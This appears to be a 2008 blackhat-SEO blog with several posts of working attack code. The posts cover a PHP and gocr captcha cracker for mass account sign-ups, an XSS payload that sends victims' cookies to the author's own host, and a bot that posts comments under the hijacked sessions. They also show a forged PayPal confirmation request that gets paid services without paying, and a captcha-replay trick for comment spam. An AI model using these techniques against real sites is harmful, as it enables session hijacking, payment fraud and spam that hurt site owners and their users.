Latest Posts

How to crack a captcha

Ingredients:

- a pligg captcha
- gocr
- ImageMagick
- PHP

You’ve probably already heard about pligg, it’s a digg clone which is pretty easy to install. That means a lot of people already have it running on their domain (free backlinks with different IPs and PageRank!).

Google: inurl:live_comments.php

Pligg demands you enter the right captcha answer at sign up. Once you’re signed up however, you no longer need to enter captcha’s. So if you’re like me, you sign up for the sites, keep the passwords and logins in a nice list, put a small bot together and throw a couple of links to the pligg sites.

If however, you want to sign up for a lot of pligg sites and don’t want to do it manually you’ll have to crack the captcha pligg provides. Lukily the captcha is pretty easy to crack since there is enough space between all the numbers.

So we start by downloading the captcha through PHP with wget, you can fetch the captcha’s URL with fsockopen/curl on the sign-up page:

  1. exec("/usr/bin/wget -O /home/cracker/captcha.jpg http://www.pliggsite.com/ts_image.php?ts_random=[xxxx] . " > /dev/null"));

captcha image

Okay so we downloaded the captcha and saved it. Now let’s perform some ImageMagick actions to clear the noise in the background. We’ll use a floodfill to find the background color and then remove it from the image.

  1. exec("/usr/local/bin/convert /home/cracker/captcha.jpg -quality 100 /home/cracker/captcha.jpg");
  2. //optimize
  3. exec("/usr/local/bin/convert /home/cracker/captcha.jpg -fuzz 25000 -fill black -draw ‘color 5,5 floodfill’ -quality 100 /home/cracker/captcha_c.jpg");
  4. //floodfill and fill bg in black
  5. exec("/usr/local/bin/convert /home/cracker/captcha_c.jpg -negate -quality 100 /home/cracker/captcha_h.jpg");
  6. //negate the picture
  7.  
  8. exec("/usr/local/bin/convert /home/cracker/captcha_h.jpg -shave 10×10 -quality 100 /home/cracker/captcha_cracked.jpg");
  9. //remove the border

Now we have a nice image with no background noise:

image clean

Ok so that’s looking pretty good. However we need to optimize this image a bit. First of all, for gocr to work properly we’ll need to add more space in between the numbers. We also should make the numbers bolder so gocr will recognize it better/faster.

  1. $im = imagecreatefromjpeg(‘captcha_cracked.jpg’);
  2.  
  3. $width = imagesx($im);
  4. $height = imagesy($im);
  5.  
  6. $x = 0;
  7. $y = 0;
  8.  
  9. $new = imagecreate($width+300, $height+200); //make space for the extra spacing
  10. $white = imagecolorallocate($new, 255, 255, 255);
  11. $black = imagecolorallocate($new, 0, 0, 0);
  12. $start = false;
  13. $hitfound = 0;
  14. $newx = 0;
  15. $newy = 0;
  16. $lastx = 0;
  17. while ($x < $width) {
  18. $y = 0;
  19.  
  20. $foundblack = 0;
  21.  
  22. while ($y < $height) {
  23. if ((16777215 - imagecolorat($im, $x, $y)) > 1211142 ) {
  24. $newy = $y;
  25. imagesetpixel($new, $newx, $newy, $black);
  26. imagesetpixel($new, $newx+1, $newy, $black);
  27. imagesetpixel($new, $newx-1, $newy, $black);
  28.  
  29. $foundblack++;
  30. } else {
  31. if ( (aboveme($im, $x, $y) && belowme($im, $x, $y))    ) {
  32. imagesetpixel($new, $newx, $newy, $black);
  33. $foundblack++;
  34. } else {
  35. imagesetpixel($new, $newx, $newy, $white);
  36. }
  37. }
  38. $y++; $newy++;
  39. }
  40. if ( ($foundblack < 2) && ($start) && ($hitfound < 7) && ($x > $lastx+6) ) {
  41. $newx += 50;
  42. $lastx = $x;
  43. $hitfound++;
  44. }
  45. if (($foundblack > 0) && (!$start)) $start = true;
  46. $x++; $newx++;
  47. }
  48. imagejpeg($new, ‘old.jpg’, 100);
  49.  
  50. //round 2
  51.  
  52. $im = imagecreatefromjpeg(‘old.jpg’);
  53.  
  54. $width = imagesx($im);
  55. $height = imagesy($im);
  56.  
  57. $x = 0;
  58. $y = 0;
  59.  
  60. $new = imagecreate($width+200, $height+200);
  61. $white = imagecolorallocate($new, 255, 255, 255);
  62. $black = imagecolorallocate($new, 0, 0, 0);
  63. $start = false;
  64. $hitfound = 0;
  65. $newx = 0;
  66. $newy = 0;
  67.  
  68. while ($x < $width) {
  69. $y = 0;
  70.  
  71. $foundblack = 0;
  72.  
  73. while ($y < $height) {
  74. if ((16777215 - imagecolorat($im, $x, $y)) > 2211142 ) {
  75. $newy = $y;
  76. imagesetpixel($new, $newx, $newy, $black);
  77. imagesetpixel($new, $newx+1, $newy, $black);
  78. imagesetpixel($new, $newx-1, $newy, $black);
  79.  
  80. $foundblack++;
  81. } else {
  82. if ( (aboveme($im, $x, $y) && belowme($im, $x, $y)) || ( diagonal($im, $x, $y)     )  ) {
  83. imagesetpixel($new, $newx, $newy, $black);
  84. $foundblack++;
  85. } else {
  86. imagesetpixel($new, $newx, $newy, $white);
  87. }
  88. }
  89. $y++; $newy++;
  90. }
  91. if (($foundblack > 0) && (!$start)) $start = true;
  92. if ( ($foundblack < 2) && ($start) && ($hitfound < 6) ) {
  93. $hitfound++;
  94. }
  95. $x++; $newx++;
  96. }
  97. imagejpeg($new, ‘new.jpg’, 100);
  98. }
  99. function aboveme($im, $x, $y) {
  100. return isBlack($im, $x, $y-1);
  101. }
  102. function diagonal($im, $x, $y) {
  103. return (isBlack($im, $x+1, $y-1) && isBlack($im, $x-1, $y+1) && isBlack($im, $x+2, $y-2));
  104. }
  105.  
  106. function belowme($im, $x, $y) {
  107. return isBlack($im, $x, $y+1);
  108. }
  109. function doublebelowme($im, $x, $y) {
  110. return isBlack($im, $x, $y+2);
  111. }
  112. function leftme($im, $x, $y) {
  113. return isBlack($im, $x-1, $y);
  114. }
  115. function rightme($im, $x, $y) {
  116. return isBlack($im, $x+1, $y);
  117. }
  118. function isBlack($im, $x, $y) {
  119. return (16777215 - imagecolorat($im, $x, $y)) > 2211142;
  120. }

This code is using php’s GD library to perform some operations. It will scan the image and if it finds a spot with less than 2 black pixels it means there’s a space between the 2 numbers. We put extra space between the numbers and make them bolder.

bold image

The final step is to fetch the result from gocr.

Ofcourse you first need to train gocr, you can do this by:

gocr -p data/ -m 256 -m 2 -a 25 new.jpg

This will train gocr. If you feel gocr has learned enough, you can request the captcha result by doing:

  1. exec("/usr/bin/gocr -p data/ -m 256 -m 130 new.jpg", $a);
  2. print_r($a); //print the captcha answer

$a will contain the answer, simply post that to the sign up page with fsockopen and you’re in! Massive accounts in no time.

Aug 22, 2008 | 0 comments | Read more

Feeding cookies to a bot

You’ve probably heard of XSS. The javascript injection which will steal your cookie, bypassing the cross-domain policy implemented by browsers. Normally, you are not allowed to see the cookie of another site/control a user on another site.

However, if a site has XSS leaks, this does become possible. All you need is a way to inject javascript (clientscript) code onto the page. It does not even have to be saved on the site itself, simply an unfiltered echo $_GET['whatever']; will do.

Once you find this, you can steal the cookie and use it to act like the user. There are 2 options: either you use the cookie with a bot you wrote, or you mimic the user actions with javascript/ajax, since you can access javascript on the other site.

I’ll talk about sending the cookie to your bot, which will for example post a comment on a popular social network.

Let’s say the XSS hole you found is : http://www.othersite.com/input.php?txt=[whatever]
All you do is inject this piece of javascript code to attach the script to the current page:

var ss = document.createElement(’script’); ss.src = ‘http://www.mysite.com/cookiejar.php?cookie=’ + document.cookie; ss.type = ‘text/javascript’; document.getElementsByTagName(’head’)[0].appendChild(ss);

This will send the cookie to cookiejar.php where we will catch the cookie and feed it to our bot.

  1. function post($cookie) {
  2.  
  3. $fp = fsockopen("othersite.com", 80, $errno, $errstr, 30);
  4. if (!$fp) {
  5. echo "$errstr ($errno)<br />\n";
  6. } else {
  7. $salida = "POST /comment.php HTTP/1.1\r\n";
  8. $salida.="Host: othersite.com\r\n";
  9. $salida.="Cookie: " . $cookie . "\r\n";
  10. $salida.="Connection: close\r\n\r\n";
  11.  
  12. fwrite($fp, $salida);
  13. while (!feof($fp)) {
  14. $d = fgets($fp);
  15.  
  16. }//end while
  17. }//end else
  18. fclose($fp);
  19. }

Now the bot will send a comment under the user’s name. Ofcourse, this will use the same IP address for all the users you stole their cookie from. If you want to avoid this, mimic the behaviour in ajax.

Aug 14, 2008 | 0 comments | Read more

seoBooster will boost your rankings

I decided to put a script online which I use to promote my websites. This script will get a new site indexed in google in 2 hours. It generates about 50 backlinks (all whitehat) from various social bookmarking sites, pliggs (digg clones), directories, …

It will also submit your site and keywords to SQUIRT and SQUIRT2 which is a seo tool to promote your sites. SQUIRT will submit your site to various social bookmarking sites, directories, a dedicated blog network and more… You can read more about SQUIRT here.

This tool will submit your site to (19 bookmarking sites):

  • ClipClip
  • Furl
  • Del.icio.us
  • SearchLes
  • BlinkList
  • Spurl
  • Simpy
  • ThingsIWant
  • SpotBack
  • Faves
  • BuddyMarks
  • Mister-Wong
  • FyberSearch
  • and some more minor bookmarking sites

It will ping your feed to pingomatic and submit it to rss aggregators.

It will generate a backlink on 55 different popular pligg websites (all different C class IPs), most with pagerank.

So on top of all the advantages that SQUIRT and the new SQUIRT2 gives you, you get additional benefits by all the extra features I added in my script.

You can use this script for $7 / url which is very cheap considering there are tons of services on digitalpoint asking a lot more for less.

URL:
Feed:
Tags:
Cat:
Description:
Title:

Take advantage of this script now:

This will redirect to a page after payment where you can enter your URL and keywords. Enjoy the backlinks!

Multiple domains? Contact me or add a comment for a discount.

Jul 27, 2008 | 1 comment | Read more

Re-use paid service

Programmers are lazy. Especially when it comes to protecting their program. Yesterday I came across a nice example of laziness.

Let’s say you buy an online service somewhere through paypal. Like for example a site which will submit your article to hundreds of other websites. But you have to pay each time you submit a new article.

How can you bypass this? Well first, you’ll have to pay for 1 article just to see how the system works and verifies purchases. So what I did was input my article in the form, pay with paypal and see how my article was being published on all the other websites.

In the background I had been logging all headers and responses with Live Http Headers. After I submitted the form, I was being redirected to a file called paypal.php which saves the article and redirects to paypal. In the post redirect to paypal the owner of the site naturally sends along an ID to the saved article so that when I paid it will know what my article is.

So I paid and was redirected to a page confirming my payment (/cgi-bin/paid.pl) with the following post parameters sent from paypal to the confirmation page:

txn_type=web_accept&payment_date=11%3A09%3A21+Jul+26%2C+2008+PDT&last_name=John&residence_country=US&item_name=Whatever&payment_gross=10.00&mc_currency=USD&business=&payment_type=instant&payer_status=verified&verify_sign=KiPd9Bdvkeyf7FQfdbScxo4dgo3pxccAEgZO5zWesa23-6fdf-cfsRndvPLzSvxc6Jds903dfDF&payer_email=&tax=0.00&txn_id=&first_name=&receiver_email=&quantity=1&payer_id=&invoice=[INVOICE ID]receiver_id=&item_number=&payment_status=Completed&mc_fee=1.17&payment_fee=1.17&shipping=0.00&mc_gross=10&custom=&charset=&notify_version=2.4&merchant_return_link=Click+Here+to+Continue

So naturally, I captured this and tried the following:

  1. $fp = fsockopen("www.target.com", 80, $errno, $errstr, 30);
  2. if (!$fp) {
  3. echo "$errstr ($errno)<br />\n";
  4. } else {
  5. $postdata = ‘txn_type=web_accept&payment_date=11%3A09%3A21+Jul+26%2C+2008+PDT&last_name=John&residence_country=US&item_name=Whatever&payment_gross=10.00&mc_currency=USD&business=&payment_type=instant&payer_status=verified&verify_sign=KiPd9Bdvkeyf7FQfdbScxo4dgo3pxccAEgZO5zWesa23-6fdf-cfsRndvPLzSvxc6Jds903dfDF&payer_email=&tax=0.00&txn_id=&first_name=&receiver_email=&quantity=1&payer_id=&invoice=[INVOICE ID]receiver_id=&item_number=&payment_status=Completed&mc_fee=1.17&payment_fee=1.17&shipping=0.00&mc_gross=10&custom=&charset=&notify_version=2.4&merchant_return_link=Click+Here+to+Continue’;
  6. $salida = "POST /cgi-bin/paid.pl HTTP/1.1\r\n";
  7. $salida.="Host: www.target.com\r\n";
  8. $salida.="Content-Type: application/x-www-form-urlencoded\r\n";
  9. $salida.="Content-Length: ".strlen($postdata)."\r\n";
  10. $salida.="Connection: close\r\n\r\n";
  11. $salida.=$postdata;
  12. fwrite($fp, $salida);
  13. while (!feof($fp)) {
  14. $d = fgets($fp);
  15. echo $d;
  16. }
  17. }
  18. fclose($fp);

Which the paid.pl gladly accepted and started with distributing my article.

So after that I tried inputting another article in the form, get redirected to paypal. I did not pay, but instead captured the Invoice ID and changed it in the postdata in the code below.

The mistake that paid.pl made was not using the paypal API to verify if the payment was in fact completed. Instead, it simply looked at one of the parameters, presumable payment_status and just assumed the payment was completed.

So modifying parameters and then sending them to a payment verification system might sometimes work if the programmer was too lazy to use the paypal API.

Ofcourse you could use FireFox’s Tamper data as well to do this kind of stuff.

Jul 27, 2008 | 0 comments | Read more

Defeating Captcha’s

This is my first post on this brand new website focussing on programming tricks.

This one is for all you blackhat seo people out there trying to beat captcha’s with gocr or your own code.

The first thing you have to realise is that beating captcha’s with neaural networks is possible, but it’s very hard.
So if there’s an easier way out, then we’d all be happy to follow that route, right?

Let’s think about how a captcha system works. You create a random string, use GD or ImageMagick to put the string in an image. For the system to know if the entered code corresponds to the right string in the image, it needs to know the answer for every generated captcha.

We can assume that most captcha systems link the filename of the captcha image to the right answer in a database, like so:

Table answers
——————–

Generated image |  Answer
————————-

captcha1.jpg  | DOF93fF

captcha2.jpg  | lf3FM9

Once a person/bot enters the text in the textfield, the system will check if the input corresponds to the right answer. If the input is the same as the answer, you can pass. After that the system SHOULD remove/deactivate the row because the right answer was given to the question.

This is where a lot of systems go wrong. They keep the row in the database, they do not deactivate or remove this row. What are the consequences?

Let’s say I want to post a comment on a blog like this with php:

  1. function comment() {
  2. $fp = fsockopen($domain, 80, $errno, $errstr, 30);
  3. if (!$fp) {
  4. echo "$errstr ($errno)
  5. \n";
  6. } else {
  7. $postdata = "comment_ID=0&comment_level=&comment_post_ID=348&redirect_to=&author=poster&email=fakemail@mail.com&url=&comment=" . urlencode("drop your link here") . "&comment_autobr=1&comment_cookies=1&capcode=ZUTEoo&cid=413&submit=Send+comment";
  8. $salida = "POST /htsrv/comment_post.php HTTP/1.1\r\n";
  9. $salida.="Host: " . $domain . "\r\n";
  10. $salida.="User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n";
  11. $salida.="Content-Type: application/x-www-form-urlencoded\r\n";
  12. $salida.="Content-Length: ".strlen($postdata)."\r\n";
  13. $salida.="Referer: http://" . $domain . $rest . "\r\n";
  14. $salida.="Connection: close\r\n\r\n";
  15. $salida.=$postdata;
  16.  
  17. fwrite($fp, $salida);
  18. while (!feof($fp)) {
  19. $d = fgets($fp);
  20. echo $d;
  21. }
  22. }
  23. fclose($fp);
  24. }

The headers I got by making a most through firefox and capturing them with Live HTTP Headers.
As you can see, the captcha details are included in the post parameters:

capcode=ZUTEoo&cid=413

The cid is most likely the number of the row in the database, this way the system keeps track of which captcha is displayed. The capcode is the correct answer I entered, so this comment will succeed.

Since this is an example of a bad captcha system, it will ofcourse not remove/deactivate the row in the database. Which means I can trick the system into thinking I got the same captcha again (while obviously I got another captcha) and use the same answer I provided earlier. I simply change all the other post parameters but keep using the same captcha parameters:

  1. function comment() {
  2. $fp = fsockopen($domain, 80, $errno, $errstr, 30);
  3. if (!$fp) {
  4. echo "$errstr ($errno)
  5. \n";
  6. } else {
  7. $postdata = "comment_ID=0&comment_level=&comment_post_ID=455&redirect_to=&author=poster&email=fakemail@mail.com&url=&comment=" . urlencode("drop your link here") . "&comment_autobr=1&comment_cookies=1&capcode=ZUTEoo&cid=413&submit=Send+comment";
  8. $salida = "POST /htsrv/comment_post.php HTTP/1.1\r\n";
  9. $salida.="Host: " . $domain . "\r\n";
  10. $salida.="User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n";
  11. $salida.="Content-Type: application/x-www-form-urlencoded\r\n";
  12. $salida.="Content-Length: ".strlen($postdata)."\r\n";
  13. $salida.="Referer: http://" . $domain . $rest . "\r\n";
  14. $salida.="Connection: close\r\n\r\n";
  15. $salida.=$postdata;
  16.  
  17. fwrite($fp, $salida);
  18. while (!feof($fp)) {
  19. $d = fgets($fp);
  20. echo $d;
  21. }
  22. }
  23. fclose($fp);
  24. }

So I changed the comment_post_ID parameter, which means I posted a comment on another page/blog, but I still kept using the same captcha answer. A lot of systems are vulnerable to this technique, I have been using this very same technique on alexa top 50 websites and they still are vulnerable after all these months.

I hope all of this makes sense. If not, please leave a comment and I’ll do my best to explain.

Jul 23, 2008 | 0 comments | Read more